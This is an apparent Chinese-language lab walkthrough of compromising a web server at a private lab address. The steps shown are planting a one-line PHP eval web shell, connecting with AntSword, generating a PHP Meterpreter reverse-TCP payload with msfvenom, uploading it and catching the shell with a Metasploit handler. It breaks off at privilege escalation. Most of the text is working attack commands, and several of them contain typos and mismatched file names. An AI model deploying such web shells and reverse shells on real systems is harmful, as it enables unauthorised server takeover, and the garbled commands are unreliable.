网站地址为192.168.104.128
web.php内容为:
<?php
eval($_POST[123]);
?>
linux版本信息:20.04.1-Ubuntu
nginx信息:nginx-1.21.6
php信息:PHP 7.3.33-19
php-fpm信息:/etc/php/7.3/fpm/php-fpm.conf
一、使用蚁剑连接网站
在此页面,我们可以查看当前网页的文件,但是无法访问其他页面(权限不够)
我们可以右键打开虚拟终端来查看自己的权限
二、反弹性木马
1)生成木马文件webreverse.php
msfvenom -p php/meterpreter/reverse_tcp LHORT=192.168.104.128 LPOST=12345 -f php -o shellreverse.php
其内容为:
2)上传webreverse.php至网站
可以使用命令来传递文件
python3 -m http.server 999
在蚁剑中,我们选择右键上传文件,但是因为权限问题,会导致文件上传失败。所以可以选择降低目录权限或提高自己的权限
降低目录的权限:
此时上传webreverse文件
因为该php文件是一个反弹型木马,受害者会连接攻击者,所以需要我们去监听
3)监听端口
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.104.131
set lport 12345
exploit
访问192.168.104.128的shellreverse.php时,这台受害主机就会连接到我们的攻击主机中
4)提权
此时我们的权限是比较低,所以需要在此进行提权